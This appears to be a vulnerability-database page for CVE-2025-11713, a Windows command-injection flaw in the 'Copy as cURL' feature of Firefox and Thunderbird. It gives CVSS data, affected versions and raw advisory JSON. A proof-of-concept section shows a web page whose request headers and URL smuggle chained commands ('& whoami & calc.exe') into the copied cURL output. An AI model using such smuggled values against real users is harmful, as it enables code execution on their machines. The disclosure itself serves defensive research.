Security Vulnerability Report
中文
CVE-2025-11713 CVSS 8.1 HIGH

CVE-2025-11713

Published: 2025-10-14 13:15:38
Last Modified: 2026-04-13 15:16:40
Source: [email protected]

Description

Insufficient escaping in the “Copy as cURL” feature could have been used to trick a user into executing unexpected code on Windows. This did not affect the application when running on other operating systems. This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* - VULNERABLE
Mozilla Firefox < 144
Mozilla Firefox ESR < 140.4
Mozilla Thunderbird < 144
Mozilla Thunderbird < 140.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11713 PoC - Malicious HTTP Request to exploit Copy as cURL # This demonstrates how a malicious web page can trigger a vulnerable # "Copy as cURL" output in Firefox DevTools on Windows # Step 1: Create a malicious HTML page that triggers a network request # with shell metacharacters in headers/URL parameters malicious_html = ''' <!DOCTYPE html> <html> <head><title>Test Page</title></head> <body> <script> // Craft a fetch request with malicious payload in headers // The payload contains Windows command injection characters fetch("https://example.com/api?param=value%26%26calc.exe", { method: "GET", headers: { "X-Custom-Header": "value & whoami & calc.exe", "User-Agent": "Mozilla/5.0 & malicious_command" }, credentials: "include" }); </script> </body> </html> ''' # Step 2: When user opens DevTools -> Network tab, right-clicks the request # and selects "Copy as cURL", Firefox generates an improperly escaped command: # # VULNERABLE OUTPUT (example): # curl "https://example.com/api?param=value&&calc.exe" -H "X-Custom-Header: value & whoami & calc.exe" -H "User-Agent: Mozilla/5.0 & malicious_command" # # When pasted into Windows cmd.exe, the unescaped & characters cause # command chaining, executing the injected commands. # Step 3: User pastes into cmd.exe -> commands execute on victim's machine print("PoC: Host the malicious HTML and trick user to use Copy as cURL on Windows") print("Affected: Firefox < 144, Firefox ESR < 140.4, Thunderbird < 144")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11713", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.567", "lastModified": "2026-04-13T15:16:40.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient escaping in the “Copy as cURL” feature could have been used to trick a user into executing unexpected code on Windows. This did not affect the application when running on other operating systems. This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "563626A1-A62C-4F33-A40F-31AC364254E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "7C6D96D2-1E0E-4A18-B8B1-21F67E1AB441"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionStartIncluding": "141.0", "versionEndExcluding": "144.0", "matchCriteriaId": "0BD75942-93B9-47A4-9762-05965EBD7FFF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1986142", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.